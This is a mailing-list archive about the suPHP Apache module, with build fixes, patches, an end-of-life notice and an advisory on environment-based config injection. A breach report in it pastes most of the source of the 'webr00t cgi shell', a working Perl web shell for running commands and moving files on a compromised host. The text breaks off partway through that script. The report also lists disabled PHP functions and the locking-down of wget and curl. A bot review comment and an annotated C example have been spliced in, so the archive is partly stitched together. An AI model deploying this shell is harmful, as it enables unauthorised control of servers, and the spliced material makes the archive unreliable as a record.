Michael Winterberg | 16 Feb 16:52 2014

Re: How to get more details ?

Hello,

I have the same problem now.
suPHP and MediaWiki.
But the link to the solution is broken now.
Do you remember how you solved the problem?

Thanks a lot for the help.

-----------------------------------------------------------------------------------------------------
Michael Winterberg (CTO)
find my profile @ michael.tischefrei.de
tischefrei.de GmbH | Franz-Schubert-Str. 3 | 36043 Fulda
Registered office: Fulda | Commercial register: Amtsgericht Fulda HRB 6123
Managing directors: Bernhard Fichtenbauer, Tobias Walter, Michael Winterberg
-----------------------------------------------------------------------------------------------------

_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Lance | 27 Oct 23:57 2013

Help adding 2 new options

I hope someone can help me with this. I've been trying to add two new options to mod_suphp, basically suPHP_NProc and suPHP_NProc_Error. I'm just not good enough with C to get it all working correctly.

I was wanting suPHP_NProc to set the maximum number of permitted PHP processes. (I know Apache has RLimitNProc, but I was just looking to add something that is suPHP specific.)

The other option suPHP_NProc_Error I was wanting to add to let you override the error code that is returned when the process limit is reached instead of returning a generic 500 error code (Internal Server Error).

Any help with this would be appreciated.
suphp | 13 Oct 13:21 2013

htaccess override suphp_ConfigPath

Howdy :-)

On Debian 7 I have some virtual hosts (each virtual host has a php.ini that
is not visible in the FTP root).

i.e.

DocumentRoot /home/domain1/domain1/
suPHP_ConfigPath /home/domain1/

I need to use htaccess, and I modified AllowOverride from None to FileInfo:

AllowOverride FileInfo

Works :-)

But if I put (in htaccess) this line:

suPHP_ConfigPath /home/domain1/domain1/

I can write a NEW php.ini and override ALL security options!

What should I do?

Thanks

Pol
Sebastiaan Hoogeveen | 9 Oct 10:16 2013

Patch for logging of exceptions

Hi,

If SuPHP cannot run a script (e.g. because an Apache process limit has been reached) currently no error is
logged. The following very small patch makes exception information appear in the SuPHP log to help find
these (and possibly other) configuration issues:

---
diff -u -r suphp-0.7.2/src/Application.cpp suphp-0.7.2-patched/src/Application.cpp
--- suphp-0.7.2/src/Application.cpp     2013-05-20 13:24:54.000000000 +0200
+++ suphp-0.7.2-patched/src/Application.cpp     2013-10-09 09:14:55.000000000 +0200
 <at>  <at>  -136,6 +136,7  <at>  <at> 
         // So, if we get here, return with error code
         return 1;
     } catch (SoftException& e) {
+        logger.logError(e.toString());
         if (!config.getErrorsToBrowser()) {
             std::cerr << e;
             return 2;
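Review bot: the new logger.logError(e.toString()) at the top of the catch (SoftException& e) block runs before the config.getErrorsToBrowser() check, so in the branch that already does std::cerr << e the same exception is now reported twice, once to the suPHP log and once to stderr. The context lines also do not show whether logError can itself throw; if it can (for example when the log file cannot be written), the exception escapes the handler and the return 2 path is never reached. Suggest confirming that logError is safe to call from inside a handler, or guarding it with its own try/catch, and adding a one-line comment that the log entry is intentionally in addition to the stderr output.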
---

I understand that SuPHP is no longer actively maintained, but it is still an immensely useful piece of
software to us. Not just because it separates user scripts but also because it enables us to offer our
customers the option to choose the PHP version their websites run on.

Kind regards,

-- 
Sebastiaan Hoogeveen
<s.hoogeveen@...>

NederHost is registered with the Chamber of Commerce (Kamer van Koophandel) under file number 34099781.
AskApache | 6 Jun 04:15 2013

Compile/Build issue with new 0.7.2 version

Previously I could do this:

# cd /opt/DIST/ && curl -O http://www.suphp.org/download/suphp-0.7.1.tar.gz && tar -xzf suphp-0.7.1.tar.gz && cd suphp-0.7.1
# ./configure && make && sudo make install

But with 7.2:

# ./configure
configure: error: cannot find install-sh, install.sh, or shtool in
config "."/config

So I tried to autoreconf and was able to configure, but then make:

# make
Making all in src
make[1]: Entering directory `/opt/SOURCE/suphp-0.7.2/src'
make  all-recursive
make[2]: Entering directory `/opt/SOURCE/suphp-0.7.2/src'
Making all in apache2
make[3]: Entering directory `/opt/SOURCE/suphp-0.7.2/src/apache2'
/bin/sh ../../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I.
-I../../src  -DLINUX=2 -D_REENTRANT -D_GNU_SOURCE  -I/usr/include/httpd
-I/usr/include/apr-1 -pthread
-DSUPHP_PATH_TO_SUPHP=\"/usr/local/sbin/suphp\" -DSUPHP_USE_USERGROUP -g
-O2 -MT mod_suphp.lo -MD -MP -MF .deps/mod_suphp.Tpo -c -o mod_suphp.lo
mod_suphp.c
libtool: Version mismatch error.  This is libtool 2.4.2
Debian-2.4.2-1ubuntu1, but the
libtool: definition of this LT_INIT comes from libtool 2.2.6b.
libtool: You should recreate aclocal.m4 with macros from libtool 2.4.2
Debian-2.4.2-1ubuntu1
libtool: and run autoconf again.

I was able to get it to work by doing:

# aclocal && libtoolize --force && automake --add-missing && autoreconf

So now I do:

# cd /opt/DIST/ && curl -O http://www.suphp.org/download/suphp-0.7.2.tar.gz && tar -xzf suphp-0.7.2.tar.gz && cd suphp-0.7.2
# aclocal && libtoolize --force && automake --add-missing && autoreconf && ./configure && make && sudo make install

Which works perfectly.  You may want to regenerate the build though.. 
BTW thank you for this amazingly useful piece of software, you should
add a donation link to your site.

# webmaster askapache com 0x6DC3AB5F
Sebastian Marsching | 22 May 14:29 2013

suPHP End of Life Notice

Dear suPHP community,

suPHP has been around for more than ten years now.

As some of you have noticed, the development activity has declined with 
time, in particular over the last four years.

I started the suPHP project when I was sharing a server with some 
friends and thus we wanted each user to have her individual space. As 
over time servers became cheaper and cheaper, each person started to use 
a server of her own. For about the last six years, I have only been 
using suPHP because my server had been setup this way and there was no 
immediate reason to change.

Thus, I have not been personally interested in further developing suPHP 
for quite some time. In addition to that I hardly found time to take 
care of suPHP in the last few years. I am still very interested and 
active in the idea of open-source software, however as my interests 
shifted, the projects I have been working on lately shifted as well.

If you want to get an idea about which kind of projects I am talking 
about, you might want to have a look at my personal projects at 
http://projects.marsching.org/ and my company's open-source projects at 
http://oss.aquenos.com/.

In conclusion this has left suPHP in a state where it would be 
irresponsible to suggest to users that it is being actively maintained. 
For example the latest security update has been lying around for years 
before actually being released.

Therefore, I officially announce that suPHP has reached its end of life 
and will not be maintained by me in the future.

So does this mean that suPHP is dead? This entirely depends on you, the 
community.

At some points in time during the last years, I have seen quite some 
activity on the mailing-list, including people discussing bugs and new 
features and writing patches for them.

As suPHP is open-source software, everyone is free to keep building on 
top of it. Actually I hope that someone might be interested in 
maintaining suPHP in the future.

While I will not take an active role in this process, be assured that I 
will support it (e.g. by keeping this mailing-list available as long as 
needed or making the existing code-base available under a different OSS 
license, if this helps).

I want to thank all people who helped me with the suPHP project, be it 
by reporting bugs, sharing their ideas, writing patches or answering 
questions on the mailing-list. Thanks to all of you!

- Sebastian

Aki Tuomi | 20 May 19:37 2013

Patch to allow configure against 2.4 Apache

Hi!

Attached, a small fix for configure.ac to enable compilation on Apache 2.4. 

I have tested this myself, and am running Apache 2.4 with suPHP successfully.

Aki Tuomi
Sebastian Marsching | 20 May 18:39 2013

Security Update Released

Hi,

I just released suPHP 0.7.2, which fixes a security issue present in 
suPHP 0.7.0 and 0.7.1.

The bug existed in the routine handling the display of PHP source files:

When the suPHP_PHPPath was set, mod_suphp would use the specified PHP 
executable to pretty-print PHP source files (MIME type 
x-httpd-php-source or application/x-httpd-php-source).

However, it would not sanitize the environment. Thus a user that was 
allowed to use the SetEnv directive in a .htaccess file (AllowOverride 
FileInfo) could make PHP load a malicious configuration file (e.g. 
loading malicious extensions).

As the PHP process for highlighting the source file was run with the 
privileges of the user Apache HTTPd was running as, a local attacker 
could probably execute arbitrary code with the privileges of this user.

This update fixes the problem by cleaning the environment before calling 
the PHP executable for printing the source code.

I want to thank John Lightsey for reporting this bug.

You can avoid this issue without upgrading by making sure that 
suPHP_PHPPath is not set.

There is a second change in suPHP 0.7.2, which - while not having any 
direct security implications - addresses an issue, where some unwanted 
behavior might be exploited:

suPHP offers to specify a PHP configuration file by using the 
suPHP_ConfigPath directive. For using this directive in a .htaccess 
file, AllowOverride Options must be set.

On the other hand, a user could get the same result by directly setting 
the PHPRC environment variable using the SetEnv directive. This 
directive however requires AllowOverride FileInfo.

Therefore an administrator setting AllowOverride FileInfo but not 
AllowOverride Options could have been tricked into believing that a user 
could not specify a configuration file, while in fact she could.

This is fixed now, because now suPHP will ignore the PHPRC environment 
variable and only use the SUPHP_PHP_CONFIG environment variable. This 
variable however, will always be overwritten by mod_suphp, even if it 
has been set using the SetEnv directive.

-Sebastian
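
The environment handling described in the announcement above, as an added C example; it is not suPHP's code and not part of the original message. It builds the child's environment from an allowlist, so a PHPRC set through SetEnv is dropped, and it always writes SUPHP_PHP_CONFIG from the administrator's value. The allowlist contents, the function names and the sample paths are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: the only variables the PHP child may inherit from the request.
 * PHPRC is deliberately absent, so SetEnv PHPRC in .htaccess has no effect. */
static const char *const ALLOWED[] = {
    "PATH", "REQUEST_METHOD", "QUERY_STRING", "SCRIPT_FILENAME", NULL
};

#define CONFIG_VAR "SUPHP_PHP_CONFIG"

/* True only for "name=..."; "PATHX=1" must not match "PATH". */
static int entry_is(const char *entry, const char *name)
{
    size_t n = strlen(name);
    return strncmp(entry, name, n) == 0 && entry[n] == '=';
}

static int is_allowed(const char *entry)
{
    for (size_t i = 0; ALLOWED[i] != NULL; i++)
        if (entry_is(entry, ALLOWED[i]))
            return 1;
    return 0;
}

static char *copy_string(const char *src)
{
    size_t len = strlen(src) + 1;
    char *s = malloc(len);
    if (s != NULL)
        memcpy(s, src, len);
    return s;
}

static char *make_entry(const char *name, const char *value)
{
    size_t len = strlen(name) + 1 + strlen(value) + 1;
    char *s = malloc(len);
    if (s != NULL)
        snprintf(s, len, "%s=%s", name, value);
    return s;
}

void free_env(char **envp)
{
    if (envp == NULL)
        return;
    for (size_t i = 0; envp[i] != NULL; i++)
        free(envp[i]);
    free(envp);
}

/* Returns a new NULL-terminated envp suitable for execve(), or NULL on
 * allocation failure. A request-supplied SUPHP_PHP_CONFIG never survives:
 * it is not on the allowlist, and the administrator's value is appended
 * last. With admin_config == NULL the variable is absent altogether. */
char **build_child_env(char *const request_env[], const char *admin_config)
{
    size_t in = 0, out = 0;
    while (request_env[in] != NULL)
        in++;

    char **envp = calloc(in + 2, sizeof *envp);   /* zeroed: always terminated */
    if (envp == NULL)
        return NULL;

    for (size_t i = 0; i < in; i++) {
        if (!is_allowed(request_env[i]))
            continue;                              /* drops PHPRC, malformed entries */
        envp[out] = copy_string(request_env[i]);
        if (envp[out] == NULL) { free_env(envp); return NULL; }
        out++;
    }
    if (admin_config != NULL) {
        envp[out] = make_entry(CONFIG_VAR, admin_config);
        if (envp[out] == NULL) { free_env(envp); return NULL; }
    }
    return envp;
}

const char *env_lookup(char *const envp[], const char *name)
{
    for (size_t i = 0; envp[i] != NULL; i++)
        if (entry_is(envp[i], name))
            return envp[i] + strlen(name) + 1;
    return NULL;
}

size_t env_count(char *const envp[])
{
    size_t n = 0;
    while (envp[n] != NULL)
        n++;
    return n;
}

int main(void)
{
    /* Constructed sample: what a request environment could look like when a
     * user's .htaccess contains SetEnv lines for both config variables. */
    char *request_env[] = {
        "PATH=/usr/bin:/bin", "QUERY_STRING=page=1",
        "PHPRC=/home/user1/public_html",
        "SUPHP_PHP_CONFIG=/home/user1/public_html", NULL
    };
    char **envp = build_child_env(request_env, "/etc/php5/cgi");
    if (envp == NULL)
        return 1;
    for (size_t i = 0; envp[i] != NULL; i++)
        puts(envp[i]);
    free_env(envp);
    return 0;
}
```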

Roger Abt | 25 Mar 19:47 2013

CLI - STDIN/STDOUT not defined

Hi Folks

I'd like to contribute some code to the Joomla CMS core. I wrote a little app
that searches for updates and mails the website owner if any are available.
So far not bad. Developed on localhost (XAMPP/Windows), tested on a hosting
server (Linux/shared).

And the script does not work on the hosting server, because in a parent
class's constructor (JApplicationCli = designed for the command line) there is
a statement to ensure that the call is coming from the command line:

// exit unless the script was started from the command line
if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))
{
	die();
}

On the hosting server, which uses suPHP, I figured out that these two
constants STDIN and STDOUT are not defined, and thus let the script die.

The existence of that statement lets me assume that in PHP CLI environments
these two constants should generally be defined by default. Right?

As I am not a server geek, my questions are (and hopefully someone has an
answer):

- Is this statement wrong because these constants are not necessarily
defined by the CLI environment, and should the statement in that core class
be changed?

- Are these constants not defined by default only in suPHP?

- Or is the server not properly configured and STDIN/STDOUT should be
defined? And if so, what should be changed in the configuration, and where?

I am thankful for any thoughts and hints.

Cheers
Roger
Frank Costanza | 7 Feb 00:33 2013

Hello!!

_______________________________________________
Mod-fcgid-users mailing list
Mod-fcgid-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-fcgid-users
r r | 22 Jan 16:09 2013

suPHP bypass Hack

Dear suPHP Users,

We have been using suPHP on our shared hosting servers for years, with success until today.

Also we use http://help.directadmin.com/item.php?id=247 for installation.

Code:
Safe Mode OFF
Open BaseDir ON
disable_functions:exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source
exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source
/tmp noexec
chgrp apache /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python
chmod 705 /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python

They scan for old Joomla installations like 1.5.x, 1.6.x, 1.7.x, slipstream an upload file into the folder images/stories/* and replace all the index.* files on the server.

Yes, I know users always need to update their Joomla to the latest stable version.

But my biggest concern now is how they bypass suPHP. It has worked great for years, but it seems the hackers found a way to bypass this security.

Back in the days with CLI modes they always did the same trick, so that's why we switched to suPHP CGI/FastCGI modes.

They use tooling named webr00t cgi shell and make a symbolic link to /root.

Is there someone with the same problem?

The script at cgiweb/web.root:


#!/usr/bin/perl -I/usr/local/bandmain
#------------------------------------------------------------------------------
# <b style="color:black;background-color:#ffff66">webr00t cgi shell</b> # server
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "webr00t";        # Change this. You will need to enter this
                # to login.

$WinNT = 0;            # You need to change the value of this to 1 if
                # you're running this script on a Windows NT
                # machine. If you're running it on Unix, you
                # can leave the value as it is.

$NTCmdSep = "&";        # This character is used to seperate 2 commands
                # in a command line on Windows NT.

$UnixCmdSep = ";";        # This character is used to seperate 2 commands
                # in a command line on Unix.

$CommandTimeoutDuration = 10;    # Time in seconds after commands will be killed
                # Don't set this to a very large value. This is
                # useful for commands that may hang or that
                # take very long to execute, like "find /".
                # This is valid only on Unix servers. It is
                # ignored on NT Servers.

$ShowDynamicOutput = 1;        # If this is 1, then data is sent to the
                # browser as soon as it is output, otherwise
                # it is buffered and send when the command
                # completes. This is useful for commands like
                # ping, so that you can see the output as it
                # is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
    local (*in) = <at> _ if <at> _;
    local ($i, $loc, $key, $val);
   
    $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

    if($ENV{'REQUEST_METHOD'} eq "GET")
    {
        $in = $ENV{'QUERY_STRING'};
    }
    elsif($ENV{'REQUEST_METHOD'} eq "POST")
    {
        binmode(STDIN) if $MultipartFormData & $WinNT;
        read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
    }

    # handle file upload data
    if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
    {
        $Boundary = '--'.$1; # please refer to RFC1867
        <at> list = split(/$Boundary/, $in);
        $HeaderBody = $list[1];
        $HeaderBody =~ /\r\n\r\n|\n\n/;
        $Header = $`;
        $Body = $';
         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
        $in{'filedata'} = $Body;
        $Header =~ /filename=\"(.+)\"/;
        $in{'f'} = $1;
        $in{'f'} =~ s/\"//g;
        $in{'f'} =~ s/\s//g;

        # parse trailer
        for($i=2; $list[$i]; $i++)
        {
            $list[$i] =~ s/^.+name=$//;
            $list[$i] =~ /\"(\w+)\"/;
            $key = $1;
            $val = $';
            $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} = $val;
        }
    }
    else # standard post data (url encoded, not multipart)
    {
        <at> in = split(/&/, $in);
        foreach $i (0 .. $#in)
        {
            $in[$i] =~ s/\+/ /g;
            ($key, $val) = split(/=/, $in[$i], 2);
            $key =~ s/%(..)/pack("c", hex($1))/ge;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} .= "\0" if (defined($in{$key}));
            $in{$key} .= $val;
        }
    }
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
    $EncodedCurrentDir = $CurrentDir;
    $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
    print "Content-type: text/html\n\n";
    print <<END;
<html>
<head>
<title>webr00t cgi shell</title>
$HtmlMetaHeader

<meta name="keywords" content="W£ßRooT,webr00t,webr00t.info,hacker">
<meta name="description" content="W£ßRooT,webr00t,webr00t.info,hacker">
</head>
<body onLoad="document.f. <at> _.focus()" bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FF0000">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#FFFFFF" bordercolor="#FFFFFF" align="center" width="1%">
<b><font size="2">#</font></b></td>
<td bgcolor="#FFFFFF" width="98%"><font face="Verdana" size="2"><b>
<b style="color:black;background-color:#ffff66">webr00t cgi shell</b> Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#FFFFFF"><font face="Verdana" size="2">

<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#FF0000">Upload File</font></a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#FF0000">Download File</font></a> |
<a href="$ScriptLocation?a=logout"><font color="#FF0000">Disconnect</font></a> |
</font></td>
</tr>
</table>
<font size="3">
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
    $Message = q$<pre><img border="0" src="http://img810.imageshack.us/img810/8043/webr00t12.png"></pre><br><br></font><h1>Sifre=webr00t</h1>
$;
#'
    print <<END;
<code>

Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
    print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
    print <<END;
<code>

<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
</font>
<font size="3">
login: <b style="color:black;background-color:#ffff66">webr00t cgi shell</b><br>
password:</font><font color="#009900" size="3"><input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
    print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
    <at> httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
    foreach $cookie( <at> httpcookies)
    {
        ($id, $val) = split(/=/, $cookie);
        $Cookies{$id} = $val;
    }
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
    print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
    print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
    &PrintPageHeader("p");
    &PrintLogoutScreen;

    &PrintLoginScreen;
    &PrintLoginForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
    if($LoginPassword eq $Password) # password matched
    {
        print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
        &PrintPageHeader("c");
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # password didn't match
    {
        &PrintPageHeader("p");
        &PrintLoginScreen;
        if($LoginPassword ne "") # some password was entered
        {
            &PrintLoginFailedMessage;

        }
        &PrintLoginForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>

END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>

<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
    if(!$WinNT)
    {
        alarm(0);
        print <<END;
</xmp>

<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
        exit;
    }
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
    if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
    {
        # we change the directory internally. The output of the
        # command is not displayed.
       
        $OldDir = $CurrentDir;
        $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
        chop($CurrentDir = `$Command`);
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$OldDir> " : "[admin\ <at> $ServerName $OldDir]\$ ";
        print "$Prompt $RunCommand";
    }
    else # some other command, display the output
    {
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
        print "$Prompt $RunCommand<xmp>";
        $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
        if(!$WinNT)
        {
            $SIG{'ALRM'} = \&CommandTimeout;
            alarm($CommandTimeoutDuration);
        }
        if($ShowDynamicOutput) # show output as it is generated
        {
            $|=1;
            $Command .= " |";
            open(CommandOutput, $Command);
            while(<CommandOutput>)
            {
                $_ =~ s/(\n|\r\n)$//;
                print "$_\n";
            }
            $|=0;
        }
        else # show output after command completes
        {
            print `$Command`;
        }
        if(!$WinNT)
        {
            alarm(0);
        }
        print "</xmp>";
    }
    &PrintCommandLineInputForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
    local($FileUrl) = <at> _;
    if(-e $FileUrl) # if the file exists
    {
        # encode the file link so we can send it to the browser
        $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
        $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
        &PrintPageHeader("c");
        print <<END;
<code>

Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # file doesn't exist
    {
        &PrintPageHeader("f");
        print "Failed to download $FileUrl: $!";
        &PrintFileDownloadForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
    local($SendFile) = <at> _;
    if(open(SENDFILE, $SendFile)) # file opened for reading
    {
        if($WinNT)
        {
            binmode(SENDFILE);
            binmode(STDOUT);
        }
        $FileSize = (stat($SendFile))[7];
        ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
        print "Content-Type: application/x-unknown\n";
        print "Content-Length: $FileSize\n";
        print "Content-Disposition: attachment; filename=$1\n\n";
        print while(<SENDFILE>);
        close(SENDFILE);
    }
    else # failed to open file
    {
        &PrintPageHeader("f");
        print "Failed to download $SendFile: $!";
        &PrintFileDownloadForm;

        &PrintPageFooter;
    }
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
    # if no file is specified, print the upload form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileUploadForm;
        &PrintPageFooter;
        return;
    }
    &PrintPageHeader("c");

    # start the uploading process
    print "Uploading $TransferFile to $CurrentDir...<br>";

    # get the fully qualified pathname of the file to be created
    chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
    $TransferFile =~ m!([^/^\\]*)$!;
    $TargetName .= $PathSep.$1;

    $TargetFileSize = length($in{'filedata'});
    # if the file exists and we are not supposed to overwrite it
    if(-e $TargetName && $Options ne "overwrite")
    {
        print "Failed: Destination file already exists.<br>";
    }
    else # file is not present
    {
        if(open(UPLOADFILE, ">$TargetName"))
        {
            binmode(UPLOADFILE) if $WinNT;
            print UPLOADFILE $in{'filedata'};
            close(UPLOADFILE);
            print "Transfered $TargetFileSize Bytes.<br>";
            print "File Path: $TargetName<br>";
        }
        else
        {
            print "Failed: $!<br>";
        }
    }
    print "";
    &PrintCommandLineInputForm;

    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
    # if no file is specified, print the download form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileDownloadForm;
        &PrintPageFooter;
        return;
    }
   
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
